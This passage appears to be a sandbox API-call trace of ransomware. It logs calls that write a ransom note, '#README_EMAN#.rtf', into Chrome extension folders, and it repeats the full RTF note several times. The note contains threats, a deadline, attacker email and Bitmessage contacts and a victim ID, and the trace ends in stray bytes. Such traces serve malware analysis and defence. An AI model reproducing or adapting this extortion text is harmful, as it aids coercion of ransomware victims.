will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.458] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x24866c8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nw̵\x94#Vç\x9f\x04Û\x03 6WZ\x83©{\x93Y(Á~\x03\r", lpUsedDefaultChar=0x0) returned 8717 [0298.458] WriteFile (in: hFile=0x2ec, lpBuffer=0x24866c8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x24866c8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0298.458] CloseHandle (hObject=0x2ec) returned 1 [0298.458] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\#readme_eman#.rtf")) returned 0xffffffff [0298.459] GetLastError () returned 0x2 [0298.459] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0298.495] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional 